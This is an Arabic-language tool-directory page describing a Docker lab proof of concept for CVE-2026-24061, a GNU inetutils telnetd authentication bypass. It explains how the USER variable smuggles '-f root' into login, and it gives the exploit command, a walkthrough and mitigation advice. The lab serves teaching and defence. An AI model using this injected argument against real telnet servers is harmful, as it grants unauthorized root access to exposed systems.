Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
telnet-inetutils-auth-bypass-CVE-2026-24061 — هذا هو إثبات مفهوم بسيط (PoC) يتيح لك إبراز خطورة ثغرة Telnet الجارية والمستغلة بنشاط في الوقت الحالي. لماذا ما زال الناس يستخدمون Telnet... هذا أمر يفوق فهمي. | Kitploit
أدوات/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

هذا هو إثبات مفهوم بسيط (PoC) يتيح لك إبراز خطورة ثغرة Telnet الجارية والمستغلة بنشاط في الوقت الحالي. لماذا ما زال الناس يستخدمون Telnet... هذا أمر يفوق فهمي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

CVE-2026-24061: تجاوز المصادقة في GNU inetutils-telnetd

مختبر Docker لتوضيح CVE-2026-24061 — ثغرة حرجة في تجاوز المصادقة في GNU inetutils telnetd ظلت دون تصحيح لمدة 11 عامًا.

الثغرة

يمرر Telnetd متغير البيئة USER مباشرة إلى /usr/bin/login دون تعقيم. يحتوي برنامج login على علامة -f التي تتخطى المصادقة (مصممة للجلسات المُصادق عليها مسبقًا). من خلال تعيين USER='-f root'، يخدع المهاجم برنامج login لمنح وصول الجذر دون كلمة مرور.

الإصدارات المتأثرة: GNU inetutils 1.9.3 (مارس 2015) حتى 2.7 درجة CVSS: 9.8 (حرجة) الإصلاح: التحديث إلى inetutils 2.8+

بدء سريع

root@kitploit:~
# بناء الصورة
docker build -t telnetd-exploit .

# تشغيل الحاوية (تسقطك في شل كمستخدم user1)
docker run --rm -it telnetd-exploit

# الاستغلال — احصل على الجذر دون كلمة مرور
USER='-f root' telnet -a localhost

ستصل إلى شل الجذر. شغّل whoami للتأكيد.

كيف تعمل

root@kitploit:~
1. يتصل العميل بـ: USER='-f root' telnet -a localhost
2. يستقبل telnetd متغير البيئة USER: "-f root"
3. ينفذ telnetd: /usr/bin/login -f root
4. يفسر login العلامة -f على أنها "تخطي المصادقة، المستخدم مُتحقق منه مسبقًا"
5. يحصل المهاجم على شل الجذر — دون الحاجة إلى كلمة مرور

لماذا توجد -f

علامة -f مشروعة — فهي مخصصة للسيناريوهات التي يكون فيها المستخدم مُصادقًا بالفعل (مثلًا، من جلسة محلية موثوقة). الخلل هو أن telnetd لا يعقّم متغير USER قبل تمريره إلى login، مما يسمح للمهاجمين عن بُعد بحقن العلامة.

التأثير

اعتبارًا من يناير 2026:

  • ~800,000 خادم Telnet مكشوف عالميًا (Shadowserver)
  • ~290,000 مفهرس على Shodan
  • الثغرة مستغلة بنشاط في البرية (فهرس CISA KEV)

لماذا لا يجب عليك استخدام Telnet

حتى بدون هذه الثغرة، ينقل Telnet كل شيء كنص عادي — بما في ذلك كلمات المرور. استخدم SSH بدلاً منه.

البروتوكولالتشفيرالمصادقة
Telnetلا يوجدنص عادي
SSHنعممفتاح/كلمة مرور

الملفات

root@kitploit:~
.
├── Dockerfile              # يبني حاوية Debian الضعيفة
├── docker-entrypoint.sh    # يبدأ inetd، يهبط إلى user1
└── README.md

التخفيف

  1. التحديث إلى GNU inetutils 2.8+
  2. تعطيل telnetd — احظر المنفذ 23
  3. استخدم SSH — نحن في 2026

المراجع

  • CVE-2026-24061
  • الإعلان الأصلي
  • إدخال CISA KEV

الاعتمادات

المختبر مبني على leonjza/inetutils-telnetd-auth-bypass

تنزيل الأداة